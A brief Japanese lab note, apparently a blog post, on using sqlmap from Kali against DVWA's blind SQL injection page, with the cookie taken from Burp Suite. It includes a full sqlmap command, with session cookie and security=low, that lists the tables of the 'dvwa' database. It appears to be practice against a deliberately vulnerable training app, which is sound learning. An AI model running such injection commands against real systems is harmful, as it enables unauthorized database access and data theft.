Hello there,
sqlmapをつかってDVWAのテーブルを探索することに。
メニューは、SQL Injection(Blind)を使用して。
まずは、user IDに『1』を入力して『Submit』ボタンを。
Burp Suiteをのぞいて。
URLとCookieの値をsqlmapのパラメータへ。
今回、KaliからDVWAを探索するので、IPアドレスはローカルホストではなく。
IPアドレスはDVWAを起動しているIPアドレスに変更する必要があり。
sqlmapのコマンドは以下の通り。
オプションのDB名は、なんとなくの推測で『dvwa』を。
python sqlmap.py -u "http://172.17.0.1:8081/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="PHPSESSID=nmq36nek5rr3r0kprbc3k9j325; security=low" -D dvwa --tables
どうやら2つのテーブルが存在するようで。
Best regards,
